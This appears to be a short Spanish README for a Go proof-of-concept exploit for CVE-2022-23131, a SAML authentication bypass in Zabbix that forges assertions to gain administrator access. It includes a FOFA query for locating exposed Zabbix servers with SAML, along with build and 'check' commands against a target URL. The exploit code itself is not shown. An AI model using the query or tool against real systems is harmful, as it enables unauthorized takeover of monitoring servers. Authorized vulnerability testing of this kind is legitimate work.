
Exploit de prueba de concepto basado en Go para CVE-2022-23131, una omisión de autenticación SAML en Zabbix. Permite acceso de administrador no autorizado mediante la falsificación de aserciones SAML. Incluye un comando de verificación para la validación del objetivo.
cve-2022-23131
Este programa es solo para uso interno de autoevaluación de riesgos por parte de los usuarios empresariales del cliente. Prohibido su uso para cualquier forma de prueba de seguridad no autorizada.
fofa: app="ZABBIX-监控系统" && body="saml"
Uso:
go build -o zexp
chmod a+x zexp
./zexp check -t https://x.x.x.x/index.php -u Admin
Captura de pantalla:

